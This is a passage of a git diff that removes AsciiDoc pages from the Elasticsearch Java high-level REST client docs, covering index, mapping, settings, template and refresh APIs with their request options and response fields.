-[id="{upid}-{api}-response"] - -==== Get Field Mappings Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Returning the field mappings for all requested indices -<2> Retrieving the mappings for a particular index -<3> Getting the mappings metadata for the `message` field -<4> Getting the full name of the field -<5> Getting the mapping source of the field - diff --git a/docs/java-rest/high-level/indices/get_index.asciidoc b/docs/java-rest/high-level/indices/get_index.asciidoc deleted file mode 100644 index 8698bff7d7c..00000000000 ---
a/docs/java-rest/high-level/indices/get_index.asciidoc +++ /dev/null @@ -1,60 +0,0 @@ --- -:api: get-index -:request: GetIndexRequest -:response: GetIndexResponse --- - -[id="{upid}-{api}"] -[[java-rest-high-get-index]] -=== Get Index API - -[id="{upid}-{api}-request"] -==== Get Index Request - -A +{request}+ requires one or more `index` arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The index whose information we want to retrieve - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-includeDefaults] --------------------------------------------------- -<1> If true, defaults will be returned for settings not explicitly set on the index - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Index Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Retrieve a Map of different types to `MappingMetadata` for `index`. -<2> Retrieve a Map for the properties for document type `doc`. -<3> Get the list of aliases for `index`. -<4> Get the value for the setting string `index.number_of_shards` for `index`. If the setting was not explicitly -specified but was part of the default settings (and includeDefault was `true`) then the default setting would be -retrieved. -<5> Retrieve all settings for `index`. -<6> The `Settings` objects gives more flexibility. Here it is used to extract the setting `index.number_of_shards` as an -integer. -<7> Get the default setting `index.refresh_interval` (if `includeDefault` was set to `true`). If `includeDefault` was set -to `false`, `getIndexResponse.defaultSettings()` will return an empty map. \ No newline at end of file diff --git a/docs/java-rest/high-level/indices/get_index_template.asciidoc b/docs/java-rest/high-level/indices/get_index_template.asciidoc deleted file mode 100644 index 3ddbfc7e8c3..00000000000 --- a/docs/java-rest/high-level/indices/get_index_template.asciidoc +++ /dev/null @@ -1,43 +0,0 @@ --- -:api: get-index-templates-v2 -:request: GetIndexTemplateV2Request -:response: GetIndexTemplatesV2Response --- - -[id="{upid}-{api}"] -=== Get Composable Index Templates API - -The Get Index Templates API allows to retrieve information about one or more index templates. - -[id="{upid}-{api}-request"] -==== Get Composable Index Templates Request - -A +{request}+ specifies one, or a wildcard expression of index template names -to get. To return all index templates, omit the name altogether or use a value of `*`. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> A single index template name -<2> An index template name using wildcard - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Templates Response - -The returned +{response}+ consists a map of index template names and their corresponding configurations. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> A map of matching index templates names and the corresponding configurations diff --git a/docs/java-rest/high-level/indices/get_mappings.asciidoc b/docs/java-rest/high-level/indices/get_mappings.asciidoc deleted file mode 100644 index 516e0633f83..00000000000 --- a/docs/java-rest/high-level/indices/get_mappings.asciidoc +++ /dev/null @@ -1,51 +0,0 @@ --- -:api: get-mappings -:request: GetMappingsRequest -:response: GetMappingsResponse --- - -[id="{upid}-{api}"] -=== Get Mappings API - -[id="{upid}-{api}-request"] -==== Get Mappings Request - -A +{request}+ can have an optional list of indices: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> An empty request that will return all indices -<2> Setting the indices to fetch mapping for - -==== Optional arguments -The following arguments can also optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Options for expanding indices names - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Mappings Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Returning all indices' mappings -<2> Retrieving the mappings for a particular index -<3> Getting the mappings as a Java Map diff --git a/docs/java-rest/high-level/indices/get_settings.asciidoc b/docs/java-rest/high-level/indices/get_settings.asciidoc deleted file mode 100644 index d0d30f25728..00000000000 --- a/docs/java-rest/high-level/indices/get_settings.asciidoc +++ /dev/null @@ -1,67 +0,0 @@ --- -:api: get-settings -:request: GetSettingsRequest -:response: GetSettingsResponse --- - -[id="{upid}-{api}"] -=== Get Settings API - 
-[id="{upid}-{api}-request"] -==== Get Settings Request - -A +{request}+ requires one or more `index` arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The index whose settings we should retrieve - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-names] --------------------------------------------------- -<1> One or more settings that be the only settings retrieved. If unset, all settings will be retrieved - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-include-defaults] --------------------------------------------------- -<1> If true, defaults will be returned for settings not explicitly set on the index - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Settings Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> We can retrieve the setting value for a particular index directly from the response as a string -<2> We can also retrieve the Settings object for a particular index for further examination -<3> The returned Settings object provides convenience methods for non String types - -If the `includeDefaults` flag was set to true in the +{request}+ the -behavior of +{response}+ will differ somewhat. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-defaults-response] --------------------------------------------------- -<1> Individual default setting values may be retrieved directly from the +{response}+ -<2> We may retrieve a Settings object for an index that contains those settings with default values diff --git a/docs/java-rest/high-level/indices/get_templates.asciidoc b/docs/java-rest/high-level/indices/get_templates.asciidoc deleted file mode 100644 index 07460a64a64..00000000000 --- a/docs/java-rest/high-level/indices/get_templates.asciidoc +++ /dev/null @@ -1,43 +0,0 @@ --- -:api: get-templates -:request: GetIndexTemplatesRequest -:response: GetIndexTemplatesResponse --- - -[id="{upid}-{api}"] -=== Get Templates API - -The Get Templates API allows to retrieve a list of index templates by name. - -[id="{upid}-{api}-request"] -==== Get Index Templates Request - -A +{request}+ specifies one or several names of the index templates to get. 
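
As a rough illustration (the `client` variable, an existing `RestHighLevelClient`, and the template name pattern are assumptions), fetching templates might look like the sketch below; the tagged snippet that follows shows the documented form.

["source","java"]
--------------------------------------------------
import org.elasticsearch.client.RequestOptions;
import org.elasticsearch.client.indices.GetIndexTemplatesRequest;
import org.elasticsearch.client.indices.GetIndexTemplatesResponse;

// Fetch every index template whose name matches a (made-up) wildcard pattern.
GetIndexTemplatesRequest request = new GetIndexTemplatesRequest("my-template-*");
GetIndexTemplatesResponse response =
    client.indices().getIndexTemplate(request, RequestOptions.DEFAULT);
int matchingTemplates = response.getIndexTemplates().size();
--------------------------------------------------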
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> A single index template name -<2> Multiple index template names -<3> An index template name using wildcard - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Templates Response - -The returned +{response}+ consists of a list of matching index templates. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> A list of matching index templates \ No newline at end of file
diff --git a/docs/java-rest/high-level/indices/indices_exists.asciidoc b/docs/java-rest/high-level/indices/indices_exists.asciidoc deleted file mode 100644 index a830ab54d3b..00000000000 --- a/docs/java-rest/high-level/indices/indices_exists.asciidoc +++ /dev/null @@ -1,38 +0,0 @@ --- -:api: indices-exists -:request: GetIndexRequest -:response: boolean --- - -[id="{upid}-{api}"] -=== Index Exists API - -[id="{upid}-{api}-request"] -==== Index Exists Request - -The high-level REST client uses a +{request}+ for the Index Exists API. The index name (or names) is required. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Index - -[[java-rest-high-indices-exists-optional-args]] -==== Optional arguments -The Index Exists API also accepts the following optional arguments through a +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-optionals] --------------------------------------------------- -<1> Whether to return local information or retrieve the state from the master node -<2> Return the result in a format suitable for humans -<3> Whether to return all default settings for each of the indices -<4> Controls how unavailable indices are resolved and how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response -The response is a +{response}+ value, indicating whether the index (or indices) exist.
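
Putting the request, optional arguments, and response together, a minimal hedged sketch could look as follows (the `client` variable, an existing `RestHighLevelClient`, and the index name are illustrative assumptions):

["source","java"]
--------------------------------------------------
import org.elasticsearch.client.RequestOptions;
import org.elasticsearch.client.indices.GetIndexRequest;

// Check whether a (hypothetical) index exists before writing to it.
GetIndexRequest request = new GetIndexRequest("posts");
boolean exists = client.indices().exists(request, RequestOptions.DEFAULT);
--------------------------------------------------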
diff --git a/docs/java-rest/high-level/indices/open_index.asciidoc b/docs/java-rest/high-level/indices/open_index.asciidoc deleted file mode 100644 index 84f038e154a..00000000000 --- a/docs/java-rest/high-level/indices/open_index.asciidoc +++ /dev/null @@ -1,70 +0,0 @@ --- -:api: open-index -:request: OpenIndexRequest -:response: OpenIndexResponse --- - -[id="{upid}-{api}"] -=== Open Index API - -[id="{upid}-{api}-request"] -==== Open Index Request - -An +{request}+ requires an `index` argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The index to open - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index is opened -as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the index is opened -as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-waitForActiveShards] --------------------------------------------------- -<1> The number of active shard copies to wait for before the open index API -returns a response, as an `int` -<2> The number of active shard copies to wait for before the open index API -returns a response, as an `ActiveShardCount` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Open Index Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request -<2> Indicates whether the requisite number of shard copies were started for -each shard in the index before timing out diff --git a/docs/java-rest/high-level/indices/put_index_template.asciidoc b/docs/java-rest/high-level/indices/put_index_template.asciidoc deleted file mode 100644 index 9a1748da0fe..00000000000 --- a/docs/java-rest/high-level/indices/put_index_template.asciidoc +++ /dev/null @@ -1,120 +0,0 @@ --- -:api: put-index-template-v2 -:request: PutIndexTemplateV2Request -:response: AcknowledgedResponse --- - -[id="{upid}-{api}"] -=== Put Composable Index Template API - -[id="{upid}-{api}-request"] -==== Put Composable Index Template Request - -A +{request}+ specifies the `name` of a template and the 
index template configuration -which consists of the `patterns` that control whether the template should be applied -to the new index, and the optional mappings, settings and aliases configuration. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of the template -<2> The index template configuration that specifies the index name patterns this template will match - -==== Settings -The settings of the template will be applied to the new index whose name matches the -template's patterns. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-settings] --------------------------------------------------- -<1> Settings for this template -<2> Configure the settings on the template building block -<3> Create the IndexTemplateV2 object that configures the index template to apply the defined template to indices matching the patterns - -==== Mappings -The mapping of the template will be applied to the new index whose name matches the -template's patterns. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-mappings-json] --------------------------------------------------- -<1> The mapping, provided as a JSON string -<2> Configure the mapping on the template building block - -==== Aliases -The aliases of the template will define aliasing to the index whose name matches the -template's patterns. A placeholder `{index}` can be used in an alias of a template. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-aliases] --------------------------------------------------- -<1> The alias to define -<2> The alias to define with placeholder -<3> Configure the aliases on the template building block - -==== Component templates -Component templates can be used as building blocks for specifying mappings, settings or aliases -configurations, but they don't apply to indices themselves. To be applied to an index, the -component templates must be specified in the `componentTemplates` list of the `IndexTemplateV2` -index template definition object. The order in which they are specified in the list is the order -in which the component templates are applied. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-component-template] --------------------------------------------------- -<1> The component template used by this index template - -==== Priority -In case multiple templates match an index, the priority of matching templates determines -the index template which will be applied. -Index templates with higher priority "win" over index templates with lower priority. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-priority] --------------------------------------------------- -<1> The priority of the template - -==== Version -A template can optionally specify a version number which can be used to simplify template -management by external systems. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-version] --------------------------------------------------- -<1> The version number of the template - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-create] --------------------------------------------------- -<1> To force to only create a new template; do not overwrite the existing template - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Put Composable Index Template Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request diff --git a/docs/java-rest/high-level/indices/put_mapping.asciidoc b/docs/java-rest/high-level/indices/put_mapping.asciidoc deleted file mode 100644 index 971ad52d62b..00000000000 --- a/docs/java-rest/high-level/indices/put_mapping.asciidoc +++ /dev/null @@ -1,75 +0,0 @@ --- -:api: put-mapping -:request: PutMappingRequest -:response: PutMappingResponse --- - -[id="{upid}-{api}"] -=== Put Mapping API - -[id="{upid}-{api}-request"] -==== Put Mapping Request - -A +{request}+ requires an `index` argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The index to add the mapping to - -==== Mapping source -A description of the fields to create on the mapping; if not defined, the mapping will default to empty. 
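
For orientation, a hedged end-to-end sketch of adding a field to an existing index is shown below (the `client` variable, the index name, and the field definition are assumptions made for illustration); the tagged snippets that follow show the documented ways of providing the mapping source.

["source","java"]
--------------------------------------------------
import org.elasticsearch.client.RequestOptions;
import org.elasticsearch.client.indices.PutMappingRequest;
import org.elasticsearch.common.xcontent.XContentType;

// Add a simple "message" text field to a (made-up) index.
PutMappingRequest request = new PutMappingRequest("twitter");
request.source(
    "{\"properties\":{\"message\":{\"type\":\"text\"}}}",
    XContentType.JSON);

boolean acknowledged =
    client.indices().putMapping(request, RequestOptions.DEFAULT).isAcknowledged();
--------------------------------------------------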
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-source] --------------------------------------------------- -<1> Mapping source provided as a `String` - -==== Providing the mapping source -The mapping source can be provided in different ways in addition to -the `String` example shown above: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-map] --------------------------------------------------- -<1> Mapping source provided as a `Map` which gets automatically converted -to JSON format - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-xcontent] --------------------------------------------------- -<1> Mapping source provided as an `XContentBuilder` object, the Elasticsearch -built-in helpers to generate JSON content - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index creation as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Put Mapping Response - -The returned +{response}+ allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request diff --git a/docs/java-rest/high-level/indices/put_settings.asciidoc b/docs/java-rest/high-level/indices/put_settings.asciidoc deleted file mode 100644 index f798482bfdd..00000000000 --- a/docs/java-rest/high-level/indices/put_settings.asciidoc +++ /dev/null @@ -1,106 +0,0 @@ --- -:api: indices-put-settings -:request: UpdateSettingsRequest -:response: UpdateSettingsResponse --- - -[id="{upid}-{api}"] -=== Update Indices Settings API - -The Update Indices Settings API allows to change specific index level settings. 
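
Before the detailed walkthrough below, here is a hedged sketch of a typical settings update (the `client` variable, the index name, and the replica count are illustrative assumptions, not part of the documented snippets):

["source","java"]
--------------------------------------------------
import org.elasticsearch.action.admin.indices.settings.put.UpdateSettingsRequest;
import org.elasticsearch.client.RequestOptions;
import org.elasticsearch.common.settings.Settings;

// Raise the replica count of a (hypothetical) index to 2.
UpdateSettingsRequest request = new UpdateSettingsRequest("posts");
request.settings(Settings.builder()
    .put("index.number_of_replicas", 2)
    .build());

boolean acknowledged =
    client.indices().putSettings(request, RequestOptions.DEFAULT).isAcknowledged();
--------------------------------------------------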
- -[id="{upid}-{api}-request"] -==== Update Indices Settings Request - -An +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Update settings for one index -<2> Update settings for multiple indices -<3> Update settings for all indices - -==== Indices Settings -At least one setting to be updated must be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-create-settings] --------------------------------------------------- -<1> Sets the index settings to be applied - -==== Providing the Settings -The settings to be applied can be provided in different ways: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-create-settings] --------------------------------------------------- -<1> Creates a setting as `Settings` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-settings-builder] --------------------------------------------------- -<1> Settings provided as `Settings.Builder` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-settings-source] --------------------------------------------------- -<1> Settings provided as `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-settings-map] --------------------------------------------------- -<1> Settings provided as a `Map` - -==== Optional Arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-preserveExisting] --------------------------------------------------- -<1> Whether to update existing settings. 
If set to `true` existing settings -on an index remain unchanged, the default is `false` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the new setting -as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the new setting -as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Update Indices Settings Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request \ No newline at end of file diff --git a/docs/java-rest/high-level/indices/put_template.asciidoc b/docs/java-rest/high-level/indices/put_template.asciidoc deleted file mode 100644 index 3e395430873..00000000000 --- a/docs/java-rest/high-level/indices/put_template.asciidoc +++ /dev/null @@ -1,132 +0,0 @@ --- -:api: put-template -:request: PutIndexTemplateRequest -:response: PutIndexTemplateResponse --- - -[id="{upid}-{api}"] -=== Put Template API - -[id="{upid}-{api}-request"] -==== Put Index Template Request - -A +{request}+ specifies the `name` of a template and `patterns` -which controls whether the template should be applied to the new index. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of the template -<2> The patterns of the template - -==== Settings -The settings of the template will be applied to the new index whose name matches the -template's patterns. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-settings] --------------------------------------------------- -<1> Settings for this template - -[[java-rest-high-put-template-request-mappings]] -==== Mappings -The mapping of the template will be applied to the new index whose name matches the -template's patterns. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-mappings-json] --------------------------------------------------- -<1> The mapping, provided as a JSON string - -The mapping source can be provided in different ways in addition to the -`String` example shown above: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-mappings-map] --------------------------------------------------- -<1> Mapping source provided as a `Map` which gets automatically converted -to JSON format - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-mappings-xcontent] --------------------------------------------------- -<1> Mapping source provided as an `XContentBuilder` object, the Elasticsearch -built-in helpers to generate JSON content - -==== Aliases -The aliases of the template will define aliasing to the index whose name matches the -template's patterns. A placeholder `{index}` can be used in an alias of a template. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-aliases] --------------------------------------------------- -<1> The alias to define -<2> The alias to define with placeholder - -==== Order -In case multiple templates match an index, the orders of matching templates determine -the sequence that settings, mappings, and alias of each matching template is applied. -Templates with lower orders are applied first, and higher orders override them. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-order] --------------------------------------------------- -<1> The order of the template - -==== Version -A template can optionally specify a version number which can be used to simplify template -management by external systems. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-version] --------------------------------------------------- -<1> The version number of the template - -==== Providing the whole source -The whole source including all of its sections (mappings, settings and aliases) -can also be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-whole-source] --------------------------------------------------- -<1> The source provided as a JSON string. It can also be provided as a `Map` -or an `XContentBuilder`. 
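
Tying the sections above together, the sketch below shows one way the whole request could be assembled. It is illustrative only: the `client` variable, the template and pattern names, and the setter names (`patterns`, `settings`, `mapping`, `order`, `version`) are assumed to mirror what the tagged snippets on this page demonstrate.

["source","java"]
--------------------------------------------------
import java.util.Arrays;
import org.elasticsearch.client.RequestOptions;
import org.elasticsearch.client.indices.PutIndexTemplateRequest;
import org.elasticsearch.common.settings.Settings;
import org.elasticsearch.common.xcontent.XContentType;

// A (made-up) template for log indices: one shard, a date field, low precedence.
PutIndexTemplateRequest request = new PutIndexTemplateRequest("my-logs-template");
request.patterns(Arrays.asList("logs-*"));
request.settings(Settings.builder()
    .put("index.number_of_shards", 1)
    .build());
request.mapping(
    "{\"properties\":{\"@timestamp\":{\"type\":\"date\"}}}",
    XContentType.JSON);
request.order(1);    // templates with a higher order override these values
request.version(3);  // informational version number for external tooling

boolean acknowledged =
    client.indices().putTemplate(request, RequestOptions.DEFAULT).isAcknowledged();
--------------------------------------------------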
- -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-create] --------------------------------------------------- -<1> To force to only create a new template; do not overwrite the existing template - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Put Index Template Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request diff --git a/docs/java-rest/high-level/indices/refresh.asciidoc b/docs/java-rest/high-level/indices/refresh.asciidoc deleted file mode 100644 index a8f812c3ed3..00000000000 --- a/docs/java-rest/high-level/indices/refresh.asciidoc +++ /dev/null @@ -1,55 +0,0 @@ --- -:api: refresh -:request: RefreshRequest -:response: RefreshResponse --- - -[id="{upid}-{api}"] -=== Refresh API - -[id="{upid}-{api}-request"] -==== Refresh Request - -A +{request}+ can be applied to one or more indices, or even on `_all` the indices: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Refresh one index -<2> Refresh multiple indices -<3> Refresh all the indices - -==== Optional arguments - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Refresh Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Total number of shards hit by the refresh request -<2> Number of shards where the refresh has succeeded -<3> Number of shards where the refresh has failed -<4> A list of failures if the operation failed on one or more shards - -By default, if the indices were not found, an `ElasticsearchException` will be thrown: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-notfound] --------------------------------------------------- -<1> Do something if the indices to be refreshed were not found \ No newline at end of file diff --git a/docs/java-rest/high-level/indices/reload_analyzers.asciidoc b/docs/java-rest/high-level/indices/reload_analyzers.asciidoc deleted file mode 
